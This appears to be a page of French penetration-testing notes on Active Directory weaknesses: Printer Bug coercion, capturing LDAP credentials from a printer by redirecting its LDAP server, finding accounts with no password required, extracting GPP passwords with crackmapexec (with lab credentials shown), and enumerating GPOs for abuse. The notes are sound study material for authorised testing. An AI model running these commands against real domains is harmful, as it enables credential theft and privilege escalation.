Skip to content

Elements de configuration à regarder

Printer Bug

https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn

Sniffer des identifiants LDAP

On peut parfois accéder à des équipements ayant une configuration ldap (par exemple un photocopieur avec la fonction scan to mail.

Dans ce cas, on peut tenter de modifier l'IP du serveur LDAP vers notre propre machine et "tester" la connection pour intercepter les identifiants / mot de passe.

)

Mot de passe non requis (PASSWORD NOT REQ)

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

crackmapexec ldap <IP> -u <User> -p <Password> --kdcHost <Host>  --password-not-required

Identifiants dans les partages SMB

Mots de passes de GPP (Stratégies de groupes de préférence)

crackmapexec smb -L | grep gpp
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_password
Get-GPPAutologon.ps1 (Powersploit)

ASRepRoasting

[[ASREPRoasting]]

GPO Abuse

Enumeration

group3rADReconPingCastle,

Get-DomainGPO (poweview)

Get-DomainGPO | Select DisplayName
Get-GPO -All | Select DisplayName

$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

Exploitation

SharpGPOAbuse